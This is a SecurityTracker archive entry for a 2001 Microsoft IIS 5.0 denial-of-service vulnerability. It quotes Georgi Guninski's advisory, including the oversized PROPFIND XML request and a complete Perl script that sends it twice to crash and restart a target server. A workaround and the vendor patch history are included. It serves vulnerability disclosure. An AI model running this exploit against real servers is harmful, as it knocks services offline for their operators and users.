SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
SecurityTracker Alert ID:  1001050
SecurityTracker URL:  http://securitytracker.com/id/1001050
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Apr 16 2001
Original Entry Date:  Mar 8 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): v5.0
Description:   Georgi Guninski reports a vulnerability with Microsoft's Internet Information Server (IIS) v5.0 in which a remote user can send a certain packet to the server, causing the server to automatically restart

It is reportedly possible to remotely restart all IIS related service using a certain request and to force IIS to consume memory which it does not free. This can be achieved using a valid but lengthy PROPFIND XML request.

See the original report for details on the format of the request.

The vendor has been contacted.

See Georgi Guninski security advisory #38, 2001 for more information.

Impact:   A remote user with access to the web server's port (which is basically everyone in the case of a public web server) can cause the server to crash and restart.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/current.asp (Links to External Site)
Cause:   Boundary error, State error
Underlying OS:  Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Microsoft Issues Bulletin Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
This is a follow-up message. Microsoft has confirmed the vulnerability and has provided a temporary workaround.
Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
This is a follow-up message. A workaround is suggested.
Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
This is a follow-up message in which an alternate workaround is suggested.
CIAC Bulletin L- 059 (Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User)
This is a CIAC Bulletin. A workaround is described in the bulletin.
Patch is Available (Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User)
The vendor has released a patch.
Re: Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
A potentially related vulnerability has been found. It may allow for remote execution of arbitrary code on the server.



 Source Message Contents

Subject:  IIS 5.0 PROPFIND DOS


Georgi Guninski security advisory #38, 2001

IIS 5.0 PROPFIND DOS

Systems affected:
IIS 5.0

Risk: Medium but may turn more serious
Date: 8 March 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.


Description:

It is possible to remotely restart all IIS related service using specially crafted request.
It is also possible to force IIS to consume memory which it does not free.
Seems to be a buffer overflow, don't know whether it is exploitable, let me know if you find
a way to exploit it.



Details:

Basically the problem are very long but valid propfind request.
For example the following PROPFIND request works for me:
---------------------
<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:$over /></a:prop>
</a:propfind>
---------------------
where length($over) ~ 128008
The first time the request is send IIS replies with 500 ... Exception. The second time the services are
restarted.




--vv5.pl-------------------------------------------------------------------------
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;

print "IIS 5.0 propfind\n";

$port = @ARGV[1];
$host = @ARGV[0];


sub vv()
{

$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow

$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
# ^^^^ This is another issue and also works with length ~>65000


$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}


do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";
---------------------------------------------------------------------------

Demonstration:


Workoround: Disable WebDav extensions and PROPFIND though I do not recommend using IIS on the Internet.


Vendor status:
Microsoft was informed on 3 March 2001



Happy 8 March to the women.

Regards,
Georgi Guninski
http://www.guninski.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC